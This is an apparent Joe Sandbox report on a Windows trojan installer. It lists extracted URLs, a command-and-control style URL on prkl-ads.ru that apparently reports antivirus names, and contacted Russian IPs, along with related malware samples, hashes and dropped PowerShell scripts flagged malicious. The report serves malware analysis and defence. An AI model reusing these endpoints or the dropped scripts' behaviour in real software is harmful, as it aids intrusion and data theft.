                  http://.cssSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.drfalse
                  • Avira URL Cloud: safe
                  		low
                  http://crls.ssl.com/ssl.com-rsa-RootCA.crl0SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drfalse
                    		high
                    https://www.thawte.com/cps0/SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drfalse
                      		high
                      http://crl.m2powershell.exe, 00000006.00000003.382384474.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.382588413.0000000007A03000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://prkl-ads.ru/?status=start&av=$displayNamesStringSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.thawte.com/repository0WSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drfalse
                          		high
                          https://www.ssl.com/repository0SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drfalse
                            		high
                            https://www.advancedinstaller.comSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drfalse
                              		high
                              http://crls.ssl.coSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://.jpgSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.drfalse
                              • Avira URL Cloud: safe
                              		low
                              http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drfalse
                                		high
                                http://crls.ssl.com/SSLcom-SubCA-CodeSigniPSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://ns.ado/1powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  81.177.140.69
                                  		prkl-ads.ruRussian Federation
                                  		8342RTCOMM-ASRUfalse
                                  45.135.232.24
                                  		unknownRussian Federation
                                  		49392ASBAXETNRUtrue

                                  General Information

                                  Joe Sandbox Version:38.0.0 Beryl
                                  Analysis ID:1294691
                                  Start date and time:2023-08-21 19:49:51 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 9m 58s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Run name:Run with higher sleep bypass
                                  Number of analysed new started processes analysed:18
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                  Detection:MAL
                                  Classification:mal50.troj.spyw.evad.winEXE@11/25@1/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 63%
                                  • Number of executed functions: 64
                                  • Number of non-executed functions: 157
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.209.48.97
                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, metacookie25c19ec61c.blob.core.windows.net, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, g.bing.com, cdn.onenote.net, arc.msn.com, blob.ams08prdstr10a.store.core.windows.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  81.177.140.69scrFE4.ps1Get hashmaliciousUnknownBrowse

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ASBAXETNRU1UlCDhAaM1.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 212.196.204.8
                                    LaCasa.vbsGet hashmaliciousNjratBrowse
                                    • 91.213.50.74
                                    Chr#U043em#U0435S#U0435tu#U0440.exeGet hashmaliciousUnknownBrowse
                                    • 194.87.31.176
                                    fx_4.7.3.exeGet hashmaliciousStealc, VidarBrowse
                                    • 194.87.31.176
                                    fx_7.4.1.exeGet hashmaliciousStealc, VidarBrowse
                                    • 194.87.31.176
                                    A7FS7UsXiY.exeGet hashmaliciousRedLine, SectopRATBrowse
                                    • 194.87.31.22
                                    VTjAohspH6.elfGet hashmaliciousUnknownBrowse
                                    • 45.130.146.7
                                    http://91.213.50.62Get hashmaliciousUnknownBrowse
                                    • 91.213.50.62
                                    http://app.adjust.com/ae38vy_kw5p6x?campaign=BILYONER_1337578_+0091218-%23%23campaign_id%3D1337578%23%23-%23%23merchant_id%3D778280%23%23&adgroup=BILYONER_1337578_+0091218&creative=BILYONER_1337578_+0091218&deep_link=hopi://campaigns/campaignId%3D1337578%26campaignType%3DPOS%26campaignTargetingType%3DPUBLIC&redirect=//is%2egd%2fvj1NpIGet hashmaliciousUnknownBrowse
                                    • 91.213.50.27
                                    UIk7s3Q4Us.elfGet hashmaliciousUnknownBrowse
                                    • 212.196.189.86
                                    armv5l-20230712-1356.elfGet hashmaliciousMiraiBrowse
                                    • 212.196.181.155
                                    Stephan_Fruehauf_sparkasse_receipt_15.01.2023.pdf - #U526f#U672c.exeGet hashmaliciousUnknownBrowse
                                    • 45.93.201.114
                                    Stephan_Fruehauf_sparkasse_receipt_15.01.2023.pdf - #U526f#U672c.exeGet hashmaliciousUnknownBrowse
                                    • 45.93.201.114
                                    https://zoe.mediaworks.hu/zctc3/48/Freemail/16169015/?redirect=https%3A%2F%2Fnewazabaka.com%2F1.php%3Fpage%3D9322041helyi-kozelet%2F2023%2F07%2Fmegkezdte-mukodeset-a-bunmegelozesi-iroda-keszthelyen-es-zalakaroson%3Futm_source%3Dfreemail_line%26utm_medium%3Dreferral%26utm_campaign%3Dott_a_49Get hashmaliciousUnknownBrowse
                                    • 91.213.50.68
                                    https://naruto.su/link.ext.php?url=https%3A%2F%2Fmononoke-inu.com%2Ff%2F781393993663608775250598025566639730617831643923461959955014Get hashmaliciousUnknownBrowse
                                    • 91.213.50.68
                                    gorbra.vbsGet hashmaliciousNjratBrowse
                                    • 91.213.50.74
                                    https://gitmind.com/app/docs/mvhmzs7pGet hashmaliciousUnknownBrowse
                                    • 212.192.14.24
                                    62DLSmaM4W.elfGet hashmaliciousMiraiBrowse
                                    • 212.196.181.170
                                    B3wGycYtCb.elfGet hashmaliciousUnknownBrowse
                                    • 212.196.169.42
                                    RTCOMM-ASRU41O3Ng20n4.elfGet hashmaliciousMiraiBrowse
                                    • 81.177.17.84
                                    scrFE4.ps1Get hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    frank_v4.ps1Get hashmaliciousRedLineBrowse
                                    • 81.177.140.194
                                    rOtpAxzBT7.elfGet hashmaliciousMiraiBrowse
                                    • 213.59.13.180
                                    sora.arm.elfGet hashmaliciousMiraiBrowse
                                    • 81.176.232.244
                                    l2UQPm9o6q.elfGet hashmaliciousMiraiBrowse
                                    • 81.177.17.33
                                    https://9sta9rt4.store/?status=reg&key=19.06_ow2hgf&site=NotionGet hashmaliciousUnknownBrowse
                                    • 81.177.140.194
                                    SECT_v4.ps1Get hashmaliciousUnknownBrowse
                                    • 195.161.114.3
                                    dImXBB5Rd4.elfGet hashmaliciousUnknownBrowse
                                    • 213.24.4.242
                                    96WwSFtZrw.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 195.161.41.198
                                    armv5l-20230712-1356.elfGet hashmaliciousMiraiBrowse
                                    • 81.176.255.15
                                    x86-20230712-1356.elfGet hashmaliciousMiraiBrowse
                                    • 81.176.255.40
                                    sora.arm.elfGet hashmaliciousMiraiBrowse
                                    • 81.177.17.99
                                    PXPz45kM78.elfGet hashmaliciousMiraiBrowse
                                    • 81.176.231.60
                                    MoEwyGqNDT.elfGet hashmaliciousUnknownBrowse
                                    • 81.177.42.10
                                    pformbook.exeGet hashmaliciousFormBookBrowse
                                    • 195.161.62.100
                                    y0uWRexXtw.exeGet hashmaliciousFormBook, PrivateLoaderBrowse
                                    • 195.161.62.100
                                    202385_dated_20.06.2023_-_#U0421PS_Grupp,_LLC.xlsGet hashmaliciousFormBookBrowse
                                    • 195.161.62.100
                                    SecuriteInfo.com.Gen.Variant.Nemesis.22803.4515.12611.exeGet hashmaliciousFormBookBrowse
                                    • 195.161.62.100

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    54328bd36c14bd82ddaa0c04b25ed9advn.cmdGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    yTj0n5qu.posh.ps1Get hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd.exeGet hashmaliciousLimeRATBrowse
                                    • 81.177.140.69
                                    SCV.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Photo_Image_Store-MnZ8RD7ic7oBUDadT3RD-22100-17668.batGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    ZI5Fu2nDVe.exeGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    EHJ.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    DHL_AWB_2506307661.exeGet hashmaliciousFormBookBrowse
                                    • 81.177.140.69
                                    qasx(1).vbsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    HVS.vbsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    #U0395#U03bd#U03c4#U03bf#U03bb#U03ae_#U03b1#U03b3#U03bf#U03c1#U03ac#U03c2.htaGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Notice_4331860.jsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    Notice_5595225.jsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    lnvoice_#72993_pdf.vbsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    Informe_Detallado_Reporte_Centrales_2023_08_015_PDF.vbsGet hashmaliciousNjratBrowse
                                    • 81.177.140.69
                                    Invoice_ID.lnkGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    file.jsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    decode_6fda918c8a7ba6982a7080a5eff5f97ec6ec50bea55936e98179f3683aa2c6e5.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 81.177.140.69
                                    decode_da721f195f41b72d8f2813eaa2c8388786bf5dffe6cbf59633a61a45576273f6.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 81.177.140.69
                                    3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.DropperX-gen.8729.3836.exeGet hashmaliciousLokibotBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Win32.PWSX-gen.10653.20560.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Win32.PWSX-gen.8807.11627.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    NEW_ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Payment_slip.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    080523-FM_06-01_WSF.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Trojan.PackedNET.2290.18406.25496.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    1.exeGet hashmaliciousGuLoaderBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Trojan.PWS.RedLineNET.7.19291.11472.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Win32.PWSX-gen.508.12387.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Remesas_Aceptadas_PDF.exeGet hashmaliciousGuLoaderBrowse
                                    • 81.177.140.69
                                    RESOL20230818RAD18082023.exeGet hashmaliciousAsyncRATBrowse
                                    • 81.177.140.69
                                    INVOICE_933736.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Diizc.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 81.177.140.69
                                    SCV.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Trojan.PackedNET.2289.22780.12057.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    arctically_revyers.exeGet hashmaliciousGuLoaderBrowse
                                    • 81.177.140.69
                                    file.exeGet hashmaliciousRedLineBrowse
                                    • 81.177.140.69
                                    kINq4bw6GZ.exeGet hashmaliciousRedLineBrowse
                                    • 81.177.140.69

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\MSI634A.tmpNotaFiscal.msiGet hashmaliciousUnknownBrowse
                                      radarinstaller.exeGet hashmaliciousUnknownBrowse
                                        radarinstaller.exeGet hashmaliciousUnknownBrowse
                                          Danfe2372342.msiGet hashmaliciousUnknownBrowse
                                            Danfe2372342.msiGet hashmaliciousUnknownBrowse
                                              id-Processo_Z5TGVQUK.msiGet hashmaliciousUnknownBrowse
                                                id-Processo_Z5TGVQUK.msiGet hashmaliciousUnknownBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8003
                                                  Entropy (8bit):4.839308921501875
                                                  Encrypted:false
                                                  SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                  MD5:937C6E940577634844311E349BD4614D
                                                  SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                  SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                  SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):10884
                                                  Entropy (8bit):5.904802065885252
                                                  Encrypted:false
                                                  SSDEEP:192:u5L9zujlDaXp2fdwiyY/M35Gb6iSR9nGJIGtuQpHB7ocQ:u5L96jwpAbyUM3PBR9GJDu8BMcQ
                                                  MD5:8CBEDA4BBB59AC09BEFBD75C787D9C97
                                                  SHA1:BE1D4356582FFE8537067AEA11C05FC28C91BEA8
                                                  SHA-256:F0144DBFCC4168EE3BA3387DEDFDCE83B427FDDB604B35627F62873EBAD46640
                                                  SHA-512:F7673E7BECFB0F46A1B3CD8A2D0E6DE9E2A3F28A98E522929F186F2A0D5432D36BEAEE9BFDC150FA6BE1E4278AE1F784ED21CBFA2F442741E40CCF3CB8D5E4DE
                                                  Malicious:false
                                                  Preview:@...e...............&...2...............\.0.....................P................./.C..J..%...].n.....%.Microsoft.PowerShell.Commands.Utility...H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.D...............fZve...F.....x.)........System.Management.Automation4...................v.A.Z...W.1........System.Data.4................ .v'#-N....M..d........System.Xml..<.....................N...>m..>........System.Management...@...............$TRE..&D.#.t.c%A........System.DirectoryServicesL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8....................@.Z:.h...........System.Numerics.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................&M ..E..;............System.Transactions.<.................hr..B.....w.O........System.ConfigurationD.....................G..H.).7.........System.Configuration.Ins

                                                  C:\Users\user\AppData\Local\Temp\MSI634A.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: NotaFiscal.msi, Detection: malicious, Browse
                                                  • Filename: radarinstaller.exe, Detection: malicious, Browse
                                                  • Filename: radarinstaller.exe, Detection: malicious, Browse
                                                  • Filename: Danfe2372342.msi, Detection: malicious, Browse
                                                  • Filename: Danfe2372342.msi, Detection: malicious, Browse
                                                  • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious, Browse
                                                  • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Pro6E69.tmp

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1514
                                                  Entropy (8bit):4.251110527181249
                                                  Encrypted:false
                                                  SSDEEP:24:m53r/bG/QEOcMgu5YlqOYx+3pd53r/bG/QEoMgu5Ylq0x+3v:wTy/QEOBgllqOYw53Ty/QElgllq0wf
                                                  MD5:B702851140B7F94A10B42E22F4066D84
                                                  SHA1:C09B748507E4FDC1BCF441BA9AADC74B3ABB298A
                                                  SHA-256:5C62FF1A65C989FE7101FDB438243AE4E5F5323AED1BFE75DAFD75B83326A7EF
                                                  SHA-512:5A16457968E851DF21FF4D66012694C3B6EB4AA47B6715593FFC65613B3DAE719F73025667E3F0EA29F725C496131DE2CBB9220DAA157AE35EA3219E2BAC4A77
                                                  Malicious:false
                                                  Preview:....StatusCode : 200..StatusDescription : OK..Content : ..RawContent : HTTP/1.1 200 OK.. Connection: close.. Content-Length: 0.. Content-Type: text/html; charset=UTF-8.. Date: Mon, 21 Aug 2023 17:50:54 GMT.. Server: Apache/2.4.6 (CentOS) PHP/7.4.33.. X-Powered-By: PHP/7.4.33.. .....Forms : ..Headers : {[Connection, close], [Content-Length, 0], [Content-Type, text/html; charset=UTF-8], [Date, Mon, .. 21 Aug 2023 17:50:54 GMT]...}..Images : {}..InputFields : {}..Links : {}..ParsedHtml : ..RawContentLength : 0....404 HTTP Error..StatusCode : 200..StatusDescription : OK..Content : ..RawContent : HTTP/1.1 200 OK.. Connection: close.. Content-Length: 0.. Content-Type: text/html; ch

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxrl35db.3yb.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ondc2hp0.eon.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\pss6E59.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):6668
                                                  Entropy (8bit):3.5127462716425657
                                                  Encrypted:false
                                                  SSDEEP:96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
                                                  MD5:30C30EF2CB47E35101D13402B5661179
                                                  SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
                                                  SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
                                                  SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
                                                  Malicious:true
                                                  Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

                                                  C:\Users\user\AppData\Local\Temp\scr6E46.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1854
                                                  Entropy (8bit):3.7148687475785183
                                                  Encrypted:false
                                                  SSDEEP:48:zB3tAnN1sAT1X1t+nWi2JgJ/yFTqDkagcv:V9AHsEX1tsWtJgkq9gcv
                                                  MD5:FEEA20931D1BB33EFE4B4FEA34A34007
                                                  SHA1:A77160427861E12AC9D860E40B3126E6C7F1AD9B
                                                  SHA-256:BCD9751A982C594D84C8EDBDF4CB9E9DF6B12E4E20528074CECC1453881A1314
                                                  SHA-512:ABCFA0C5CB82311C365AFFA786FA04E4B6DEDD6C0E4F4CFF9342EBAA423387A16512CF414A9C24CDB6833B018B82A1FD29F25DF73B89DFE74176E6B7343D2C5F
                                                  Malicious:true
